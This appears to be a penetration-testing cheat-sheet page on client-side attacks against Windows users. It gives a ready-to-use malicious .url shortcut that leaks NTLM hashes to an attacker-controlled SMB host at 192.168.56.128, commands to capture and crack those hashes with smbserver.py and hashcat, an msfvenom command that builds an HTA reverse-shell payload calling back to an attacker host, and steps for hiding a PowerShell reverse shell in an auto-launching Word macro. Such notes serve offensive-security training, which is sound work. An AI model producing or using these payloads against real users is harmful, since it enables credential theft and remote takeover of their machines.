Client Side Attacks

URL Attack (Formerly SCF)

  • If there is a location a user is reading files from, like FTP or SMB, use a file like this to grab their hash with SMBServer.py or Responder once they click it. Then crack it with Hashcat.

smbserver.py share . -smb2support
[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\192.168.56.128\%USERNAME%.icon
IconIndex=1

  • Create it as a .txt and save as .url before sending or putting in location for user

hashcat -m 5600 hash.txt /root/rockyou.txt --force

HTA

  • HTML Applications that will get executed by mshta.exe if user is on IE or Edge (with Edge the user has more security notifications to click through

msfvenom -p windows/shell_reverse_tcp LHOST=$IP LPORT=$PORT -f hta-psh -o shell.hta

  • Host the file with a web server or upload it in a known place where the user will open

Macro

  • Create a macro in a Word doc that will auto-launch on opening to give a reverse shell

  • Can use the previous msfvenom command to copy a powershell payload or just use revshells.com

  • Split the powershell payload as you aren't allowed the full amount of characters on a single line

  • Then add the payload into the macro

PreviousFinding UsersNextPowerShell Domain Enumeration

Last updated